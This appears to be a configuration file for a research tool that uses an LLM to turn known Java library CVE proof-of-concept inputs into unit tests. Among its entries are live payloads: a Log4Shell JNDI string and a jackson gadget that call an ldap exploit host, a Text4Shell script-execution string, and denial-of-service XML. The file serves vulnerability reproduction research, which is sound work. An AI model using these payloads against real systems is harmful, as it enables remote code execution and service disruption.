#CVE-2017-7957
#proj1
#vulKey=XStream,fromXML
#vulFullyQualifiedClassName=com.thoughtworks.xstream.XStream
#vulInput=<void>
#vulDescription=
#projectFilepath=///IdeaProjects/pocdataset/xstream/lion-master/lion-common/src/main/java/com/lion/common/util

#proj2
#vulKey=XStream,fromXML
#vulFullyQualifiedClassName=com.thoughtworks.xstream.XStream
#vulInput=<void>
#vulDescription=
#projectFilepath=///IdeaProjects/pocdataset/PLMCodeTemplate/source/src/common/plm/common


#CVE-2021-39144
#proj1
#vulKey=XStream,fromXML
#vulFullyQualifiedClassName=com.thoughtworks.xstream.XStream
#vulInput=///IdeaProjects/LLMPocMigration/dataset/poc/cve/poc.xml
#vulDescription=the test input data is a filepath, it needs to used to  create a java File, then as the final unit test input
#projectFilepath=///IdeaProjects/pocdataset/xstream/lion-master/lion-common/src/main/java/com/lion/common/util


#proj2
#vulKey=XStream,fromXML
#vulFullyQualifiedClassName=com.thoughtworks.xstream.XStream
#vulInput=///IdeaProjects/LLMPocMigration/dataset/poc/cve/poc.xml
#vulDescription=the test input data is a filepath, it needs to used to  create a java File, then as the final unit test input
#projectFilepath=///IdeaProjects/pocdataset/PLMCodeTemplate/source/src/common/plm/common


#CVE-2022-41966
#proj1
#projectFilepath=///IdeaProjects/pocdataset/xstream/lion-master/lion-common/src/main/java/com/lion/common/util
#vulKey=XStream,fromXML
#vulFullyQualifiedClassName=com.thoughtworks.xstream.XStream
#vulInput=<div class="Source XML"><pre> <set> <set> <set> <set> <set> <set> <string>a</string> </set> <set> <string>b</string> </set> </set> <set> <string>c</string> <set reference='../../../set/set[2]'/> </set> </set> </set> </set> </set>; </pre></div> <div class="Source Java"><pre>XStream xstream = new XStream(); xstream.fromXML(xml); </pre></div>
#vulDescription=


#proj2
#projectFilepath=///IdeaProjects/pocdataset/PLMCodeTemplate/source/src/common/plm/common
#vulKey=XStream,fromXML
#vulFullyQualifiedClassName=com.thoughtworks.xstream.XStream
#vulInput=<div class="Source XML"><pre> <set> <set> <set> <set> <set> <set> <string>a</string> </set> <set> <string>b</string> </set> </set> <set> <string>c</string> <set reference='../../../set/set[2]'/> </set> </set> </set> </set> </set>; </pre></div> <div class="Source Java"><pre>XStream xstream = new XStream(); xstream.fromXML(xml); </pre></div>
#vulDescription=

#codex
#projectFilepath=///IdeaProjects/pocdataset/base64/codec-263/DBlog-master/blog-core
#projectFilepath=///IdeaProjects/pocdataset/base64/dataease-dev/sdk/dataease-plugin-common/src/main/java
#vulKey=Base64,decodeBase64
#vulFullyQualifiedClassName=org.apache.commons.codec.binary.Base64
#vulInput=publishMessage
#vulDescription=




#string
#projectFilepath=///IdeaProjects/pocdataset/string/cve-2022-42889/datafastlane-ae17ee8d1ff0db41fb33752162a0a54da9d9bcb9/src/main
#vulKey=StringSubstitutor,replace
#vulFullyQualifiedClassName=org.apache.commons.text.StringSubstitutor
#vulInput=${script:js:new java.lang.ProcessBuilder(\"calc\").start()}
#vulDescription=


#number
#projectFilepath=///IdeaProjects/pocdataset/number/lang-1484/waiter-service/src/main/java
#vulFullyQualifiedClassName=org.apache.commons.lang3.math.NumberUtils
#vulKey=NumberUtils,isParsable
#vulInput=100.
#vulDescription=

#projectFilepath=///IdeaProjects/pocdataset/number/lang-1385/wechat-ssm/src
#vulFullyQualifiedClassName=org.apache.commons.lang3.math.NumberUtils
#vulKey=NumberUtils,createNumber
#vulInput=L
#vulDescription=


#json
#projectFilepath=///IdeaProjects/pocdataset/json/cve-2023-1370/microservice-with-jwt-and-microprofile
#vulFullyQualifiedClassName=net.minidev.json.parser.JSONParser
#vulKey=JSONParser,parse
#vulInput='{"value": 2e+}'
#vulDescription=

#projectFilepath=///IdeaProjects/pocdataset/json/cve-2022-45688/virtress/src/main/java
#vulFullyQualifiedClassName=org.json.XML
#vulKey=XML,toJSONObject
#vulInput=<a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a><a>
#vulDescription=

#
#projectFilepath=///IdeaProjects/pocdataset/json/cve-2019-14540/openam-tokens/src/main/java/org/forgerock/openam/tokens
#vulFullyQualifiedClassName=com.fasterxml.jackson.databind.ObjectMapper
#vulKey=ObjectMapper,readValue
#vulInput=[\"com.zaxxer.hikari.HikariConfig\",{\"metricRegistry\":\"ldap://127.0.0.1:1389/exploit\"}]
#vulDescription=


# compress
#vulKey=SevenZFile,SevenZFile
#vulFullyQualifiedClassName=org.apache.commons.compress.archivers.sevenz.SevenZFile
#vulInput=///IdeaProjects/LLMPocMigration/dataset/poc/compress/cve-2021-35516/endheadercorrupted.7z
#vulDescription=the test input data is a filepath, it needs to used to  create a java File, then as the final unit test input


#file
#projectFilepath=///IdeaProjects/pocdataset/file/cve-2019-12415/poi-examples/src/main/java/poi/xssf/usermodel/examples/CustomXMLMapping.java
##projectFilepath=///IdeaProjects/pocdataset/compress/cve-2021-35516/7zBruteforce/src/main/java/com/example
#vulKey=XSSFExportToXml,exportToXML
#vulFullyQualifiedClassName=org.apache.poi.xssf.extractor.XSSFExportToXml
#vulInput=///IdeaProjects/pocdataset/file/cve-2019-12415/poi-examples/CustomXMLMappings.xlsx
#vulDescription=the test input data is a filepath, it needs to used to  create a java File, then as the final unit test input

#projectFilepath=///IdeaProjects/pocdataset/file/cve-2022-24615/test/src/main/java
#vulKey=ZipInputStream,ZipInputStream
#vulFullyQualifiedClassName=net.lingala.zip4j.io.inputstream.ZipInputStream
#vulInput=///IdeaProjects/LLMPocMigration/dataset/poc/file/cve-2022-24615/proj1/crash-a49f954b47e05cc5265db441a64e5d2d55cb33b8
#vulDescription=the test input data is a filepath, it needs to used to  create a java File, then as the final unit test input
#needPt=false


#projectFilepath=///IdeaProjects/pocdataset/file/io-611/FastJoin/src/main/java
#vulKey=FilenameUtils,normalize
#vulFullyQualifiedClassName=org.apache.commons.io.FilenameUtils.normalize
#vulInput=\\\\foo\\\\.\\bar
#vulDescription=

#projectFilepath=///IdeaProjects/pocdataset/file/io-611/velocity-engine/velocity-engine-core/src/main/java/org/apache/velocity/runtime
#vulKey=FilenameUtils,normalize
#vulFullyQualifiedClassName=org.apache.commons.io.FilenameUtils.normalize
#vulInput=\\\\foo\\\\.\\bar
#vulDescription=

#projectFilepath=///IdeaProjects/pocdataset/file/cve-2021-31812/Framework-Mobile/src/main
#projectFilepath=///IdeaProjects/pocdataset/file/cve-2021-31812/PDFConvert14/src
#vulKey=PDDocument,load
#vulFullyQualifiedClassName=org.apache.pdfbox.pdmodel.PDDocument
#vulInput=///IdeaProjects/LLMPocMigration/dataset/poc/file/cve-2021-31812/crash-23adb315cc495bfd4761b16f877639d73d124d5b.pdf
#vulDescription=the test input data is a filepath, it needs to used to  create a java File, then as the final unit test input
#
#promptFilePath=///IdeaProjects/LLMPocMigration/prompts/prompt.txt
##default:true
#needPt=false


#net
#projectFilepath=///IdeaProjects/pocdataset/net/cve-2020-13956/crawler-jsoup-maven/src/main/java/com/datacrawler
#vulKey=CloseableHttpClient,execute
#vulFullyQualifiedClassName=org.apache.http.client.methods.CloseableHttpResponse
#vulInput=http://user@apache.org:80@google.com/
#vulDescription=the test input data is a url
#
#promptFilePath=///IdeaProjects/LLMPocMigration/prompts/prompt.txt
##default:true
#needPt=true

#projectFilepath=///IdeaProjects/pocdataset/net/cve-2020-13956/wechat-ssm/src/main/java
#vulKey=CloseableHttpClient,execute
#vulFullyQualifiedClassName=org.apache.http.client.methods.CloseableHttpResponse
#vulInput=http://user@apache.org:80@google.com/
#vulDescription=the test input data is a url
#
#promptFilePath=///IdeaProjects/LLMPocMigration/prompts/prompt.txt
##default:true
#needPt=true


#html
#projectFilepath=///IdeaProjects/pocdataset/html/cve-2021-37714/phoenix_interface/src/main/java/org/phoenix/api
#vulKey=Jsoup,parse
#vulFullyQualifiedClassName=org.jsoup.Jsoup
#vulInput=///IdeaProjects/LLMPocMigration/dataset/poc/html/cve-2021-37714/1605.html.gz
#vulDescription=the test input data is a filepath, it needs to used to create a java File, then as the final unit test input
#
#promptFilePath=///IdeaProjects/LLMPocMigration/prompts/prompt.txt
##default:true
#needPt=true

#projectFilepath=///IdeaProjects/pocdataset/html/cve-2021-37714/pickaxe/src/main/java/com/github/mautini/pickaxe
#vulKey=Jsoup,parse
#vulFullyQualifiedClassName=org.jsoup.Jsoup
#vulInput=///IdeaProjects/LLMPocMigration/dataset/poc/html/cve-2021-37714/1605.html.gz
#vulDescription=the test input data is a filepath, it needs to used to create a java File, then as the final unit test input
#
#promptFilePath=///IdeaProjects/LLMPocMigration/prompts/prompt.txt
##default:true
#needPt=true

#log
#projectFilepath=///IdeaProjects/pocdataset/log/cve-2021-44228/openl-tablets-master/DEV/org.openl.commons/src
#vulKey=Logger,info
#vulFullyQualifiedClassName=org.apache.logging.log4j.Logger
#vulInput=${jndi:ldap://0.0.0.0:1389/Log4jRCE}
#vulDescription=
#
#promptFilePath=///IdeaProjects/LLMPocMigration/prompts/prompt.txt
##default:true
#needPt=true
